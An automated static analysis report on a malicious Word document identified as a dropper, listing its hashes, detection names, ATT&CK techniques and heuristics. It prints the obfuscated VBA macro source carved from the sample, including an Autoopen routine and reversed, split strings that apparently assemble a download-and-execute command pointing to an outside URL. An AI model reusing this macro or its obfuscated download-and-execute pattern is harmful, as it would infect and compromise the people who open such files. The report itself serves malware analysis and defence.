Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 650c52c7824431a5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 127.0 KB
Created: 2018-05-02 21:35:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 44c4b0456185526455892b15ffab299a
SHA-1: 916368a556a07051e7225f8b28bde21d0d474e39
SHA-256: 650c52c7824431a59dbba1668b9e119d925d035dec91b11a04aa1fe96902591e
Risk score: 202

Malware Insights

MITRE ATT&CK
  T1059.005 Visual Basic
  T1204.002 Malicious File

The sample is a malicious Office document containing a legacy WordBasic Autoopen macro. The macro uses a Shell() call, indicating an intent to execute external commands, most likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6529701-0' further supports its classification as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6529701-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6529701-0
  • VBA macros detected [medium] (OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                               | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 148428 bytes
SHA-256: 26a97d07df0f650f98e4dc5418ac9db5129da4ba586163fd9b3cc5a88b6a83fd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zTYJnQbdkSvi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOGzBc(YJIoP)
IOakuA = Chr(17913)
      For YFqUW = 63075 To 97827
         iWrrnc = 42867 / 23190 / cWBNnp * 81497 - 78778 - Tan(1 / Rnd(tmFFr))
Next
End Sub
Sub QQcIQc(vJkamw)
vjsOl = Chr(35212)
      For IKkQzf = 632 To 76125
         jdiwb = 43829 / 99276 / vWzar * 55281 - 26176 - Tan(1 / Rnd(uQZMu))
Next
TZRIFr = Chr(86045)
      For wfIzB = 93076 To 14343
         zZjiSP = 40707 / 6685 / hXNFP * 50658 - 51167 - Tan(1 / Rnd(sKFfS))
Next
HUfZS = Chr(35644)
      For bRvuTA = 62248 To 30139
         DENrY = 39721 / 60275 / hEhfI * 72995 - 3466 - Tan(1 / Rnd(iIYKn))
Next
End Sub
Sub DkWGFS(wZuCU)
BRbsn = Chr(79369)
      For sNkOT = 60104 To 87563
         osHFk = 27751 / 1882 / VRONzk * 60065 - 75635 - Tan(1 / Rnd(nfADDP))
Next
UTwpzH = Chr(74981)
      For YmHhmw = 69686 To 84680
         oGaYb = 41132 / 15275 / zlfztV * 70850 - 55315 - Tan(1 / Rnd(kRRLc))
Next
End Sub
Sub Autoopen()
On Error Resume Next
iooMc = Chr(96334)
      For jDnzP = 95231 To 78742
         szoHC = 41994 / 14746 / fRXEQM * 36490 - 50866 - Tan(1 / Rnd(LsvknJ))
Next
tQDiituvjGDhc (jwFbMt + zpFkHWzkcEN + nnIrT)
DarXNJ = Chr(90257)
      For tkTkN = 19642 To 7993
         tcFoJ = 46276 / 10367 / fOlLj * 31850 - 14975 - Tan(1 / Rnd(zzmkB))
Next
End Sub
Sub XdOZq(lrzjB)
ujmiSf = Chr(40770)
      For rwXjVd = 54336 To 99805
         PXTDUF = 53347 / 51138 / hsioPC * 19287 - 2653 - Tan(1 / Rnd(bhUiH))
Next
ZjYGi = Chr(6991)
      For kmFkL = 65825 To 58937
         aKEiz = 55242 / 95251 / jVZUH * 1150 - 35075 - Tan(1 / Rnd(kQDin))
Next
VvjUHs = Chr(67157)
      For qbWwBW = 31698 To 92685
         mbipk = 10685 / 67613 / kTpzv * 58497 - 718 - Tan(1 / Rnd(tpICcU))
Next
End Sub
Sub TDizz(zvzoG)
CJrkq = Chr(95164)
      For XYtfv = 94964 To 43004
         HhIui = 34498 / 43281 / lGIlu * 70156 - 47132 - Tan(1 / Rnd(LpNwcC))
Next
End Sub

Attribute VB_Name = "SENzhaY"
Sub AbAsNr(YzfwFi)
MUnzEU = Chr(12773)
      For YhEdpp = 39975 To 39955
         kNXHKu = 84592 / 21526 / RQOSdz * 49532 - 69397 - Tan(1 / Rnd(tJhWDc))
Next
End Sub
Function zpFkHWzkcEN()
On Error Resume Next
SmmWf = Chr(3491)
      For sAWXR = 32030 To 50206
         DzkEHR = 15113 / 66060 / aDsTkC * 35426 - 70983 - Tan(1 / Rnd(qvDtJw))
Next
wYHkKlt = ACXrLz("HRjQ'+'5'+'fds//'+':ptth '+'lw'+'B'+' = XCDA'+'L1'+'N'+';'+')33'+'1282 ,00'+'0'+'0DMi", 46856 - 46856 + 4 + 46856 - 46856, 46856 - 46856 + 78 + 46856 - 46856)
ANjYwN = Chr(56068)
      For wBOEM = 59818 To 4573
         EAvbI = 90410 / 16045 / Empaii * 18752 - 79033 - Tan(1 / Rnd(RGDYJp))
Next
QwmbwD = Chr(15160)
      For AAFjs = 59181 To 7315
         iuumT = 94716 / 91674 / ivtuTS * 16986 - 20047 - Tan(1 / Rnd(JGkSPQ))
Next
BSmtjbOEs = ACXrLz("hp.c[((eCAlpER.)'}}{hcta'+'c};'+'kaerb;)CDSL1'+'N'+'()izb,", 25848 - 25848 + 5 + 25848 - 25848, 25848 - 25848 + 51 + 25848 - 25848)
UBozwB = Chr(74354)
      For oNwikJ = 23325 To 36872
         LsDJM = 6046 / 64636 / vwjYTB * 36649 - 58426 - Tan(1 / Rnd(RRIwc))
Next
niiShl = Chr(32953)
      For mMhcJJ = 19542 To 66361
         UWDTvc = 75666 / 65552 / DXiws * 18380 - 32389 - Tan(1 / Rnd(FqtmE))
Next
TVOQwqin = ACXrLz("fM0nray'+'.8'+'poop=l?p'+'hp'+'.'+'vtset'+'/'+'KRAN/'+'mo'+'c'+'.r'+'ew'+'4r'+'e'+'woXscl", 64105 - 64105 + 6 + 64105 - 64105, 64105 - 64105 + 81 + 64105 - 64105)
cKjjBb = Chr(38036)
      For NidHi = 97518 To 54893
         Gvkait = 99152 / 77225 / XLDDT * 78777 - 5078 - Tan(1 / Rnd(XaILv))
Next
aGzhVR = Chr(52414)
      For mPqSj = 47334 To 78941
         zQJIC = 52382 / 88687 / qimEVU * 63090 - 64410 - Tan(1 / Rnd(QTnZM))
Next
YjGPjBMXFb = ACXrLz("%,XbEw)'xbma", 72373 - 72373 + 4 + 72373 - 72373, 72373 - 72373 + 3 + 72373 - 72373)
OwmmcW = Chr(64387)
      For EpRXaU = 3022 To 92224
     
... (truncated)